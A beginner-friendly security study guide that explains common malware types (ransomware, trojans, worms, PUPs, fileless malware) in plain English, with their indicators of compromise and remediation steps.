Extremely Easy Security — Learn Cyber Attack Types in Plain English (1.2 Part 1)
Today we will be covering different types of cyberattacks and the indicators you can look for to find them, as well as the remediation (how to fix and remove them). All of this will be on the exam.
If that last part of that first sentence sounded condescending (looking down on someone because you think they aren’t smart), because you already know what remediation means, it wasn’t meant to be. I just don’t like big words (the opposite of small words) so I feel the need to explain everything (telling someone something until they understand).
Sorry, I really do think you’re smart (not stupid). I just can’t stop doing it, because this is Extremely Easy Security (security that isn’t hard) and it’s become a compulsion (a thing you do over and over again obsessively). Help.
Malware
What is malware, and how is it different than a virus?
“Malware” just means malicious software. It’s any program that’s somehow not good.
A lot of people use the terms virus and malware interchangeably, but this isn’t correct. A virus is malware that can replicate and spread from one user to another. That’s it. That’s all it is.
So, given that definition, all viruses are malware. But not all malware is a virus.
Another thing to be clear about is that a worm is classified as a virus because a worm is a malicious program that self-replicates. But not all viruses are worms, because not all viruses can replicate by themselves (most require user interaction).
If any of that seems confusing, I’ll explain below.
(Note: Different types of malware have different indicators of compromise, or IoCs, which are reasons you know you actually have it, sort of like a diagnosis. Each one also has different remediation techniques.
General indicators of compromise can be found here.)
Ransomware
This is when hackers gain access to your internal network and encrypt all the important files on your computer. Usually, they add a message that pops up and says you’ll never be able to get your files back unless you pay money for an encryption key. Keys can cost hundreds or millions of dollars.
Indicators of Compromise: This one is pretty obvious, because hackers will usually tell you when they want your money.
Other than that, some symptoms exist. The inability to access certain files, the names of files suddenly changing on your computer (cat.jpg becoming cat.d464kjd3), or your computer suddenly working really hard in the background (this could be the malware encrypting your files).
Remediation: The best remediation for ransomware is to prevent it. It’s hard to reverse once you’ve become a victim, unless it’s a known ransomware, but even then, it can be challenging. Ransomware is often tailored towards its target. The best way to prevent it is by having good security awareness and keeping frequent data backups. (Make sure the backups aren’t connected to your network, though, or the ransomware may find them too.)
If you’re dealing with ransomware at home, you should disconnect your computer from your network. If you have a backup, you can completely wipe the computer and restore from the backup. If you have no backups, you can run an antimalware program offline to see if it contains a decryption tool to reverse the ransomware.
If you’re in an organization, you should let the appropriate authority know you’ve been infected so they can contact an incident response team.
What you should not do in either case is immediately upload a sample of the ransomware to the internet. This may seem counterintuitive because of programs like VirusTotal, which are very effective in helping you classify unknown malware. But VirusTotal makes malware samples public, and ransomware samples can contain sensitive information about you or your company.
Some companies pay off the bad guys. The U.S. government recommends you don’t do this, but people do it anyway. They figure that the information loss is more costly than actually paying up. The problem is this reinforces criminals’ beliefs that they’ll succeed, and there’s no way to know if paying a ransom will actually work.
Check out CISA’s Ransomware Guide for more information.
Trojans
Trojan malware, like the myth, is a thing or a piece of software that looks innocent enough to let inside your network but ends up doing something evil once you activate it. There are a billion different types of trojans, but this is the basic idea.
An example might be a torrenting program that’s secretly mining cryptocurrency with your electricity and hardware. Or it could be a file that you received in an email that looks like a normal Word document, but when you open it, someone suddenly has remote access to your computer.
Remediation: Again, prevention is extremely important. Keep regular offline backups, know the signs and characteristics of social engineering, and make sure that any programs you download are legitimate and have a good reputation.
If you’re at home, disconnect your computer from your network and run a scan using an antimalware program. If you want to be sure, you can factory reset your computer and reinstall from a backup.
(If you can’t tell, I use factory resets a lot. But there are cases in which they won’t completely free you of malware, though. Sometimes backups become infected, or you’ve got a special type of malware that’s immune to factory resets, which will be covered later.)
Worms
As mentioned earlier, a worm is a type of virus that replicates and spreads on its own. A virus, in general, replicates and spreads because of user interaction (for example, someone sends you an email with the virus, you open it, and the virus sends out more of the same email).
A worm requires no user interaction to spread. Once it gets on a computer, it can find more computers connected to the first one by itself, copy itself over to those, and then replicate and keep repeating the process.
Indicators of Compromise: These can vary, but one way to suspect it’s a worm is if it seemed to have come out of nowhere, and it spread to a lot of devices on your network.
Remediation: This will depend on what type of malware it is. A ransomware worm remediation will look different than remediation for an email worm.
PUPs
PUP means “Potentially Unwanted Program.” These aren’t nearly as malicious as say, something like NotPetya. They’re mostly just annoying, but they can also be damaging to your privacy and security, like selling your data or opening you up to other problems.
Have you ever tried downloading an application only to get to the installation window and find out that the installer wants to add seven extra programs alongside it?
Sometimes they even remove the option for you to uncheck them, or don’t tell you that this is what’s attached to the program you wanted. You just download it, and then the seven extra programs appear out of nowhere.
IoCs: Strange programs suddenly appear on your desktop or program manager. Or your search engine suddenly changes to a completely different one, or browser homepage. If you run a malware scan and it doesn’t identify anything malicious, that’s also suspicious.
Remediation: I hate PUPs because antimalware programs often won’t flag them. Then they won’t remediate them, because they don’t appear malicious enough. This forces you to go through and manually delete the unwanted software, which is a security crapshoot at best. When this happens, I usually just take a backup of my files and wipe my PC anyway.
Good, respectable software companies know PUPs are annoying and don’t need to make money using them. Stick to respectable companies.
Fileless Malware
This malware is harder to track down because it never touches the actual hard drive in a computer system, and therefore leaves almost no footprint. Fileless malware resides only in memory (RAM), and once you turn off the computer, it’s gone. That’s because computer memory is volatile, meaning temporary. It’s only there until it’s off, unlike hard disk storage. Malware detection methods that involve disk, like antimalware software, also won’t work on fileless malware, which makes it appealing to attackers.
IoCs: You’ve detected malicious traffic coming from your computer and going out over the network, but you can’t find any evidence on the computer’s hard drive that there’s anything wrong.
Remediation: Your average user has a hard time remediating this type of malware. If you think it’s happening to you, it’s probably best to contact an expert. One way to at least temporarily halt it would be to simply turn your computer off, but you’ll also lose your evidence this way. While the computer is still on, incident responders isolate infected computers from the network and take a snapshot of the memory using a program like Volatility for investigation.
(For more information see this great article from Cybereason.)
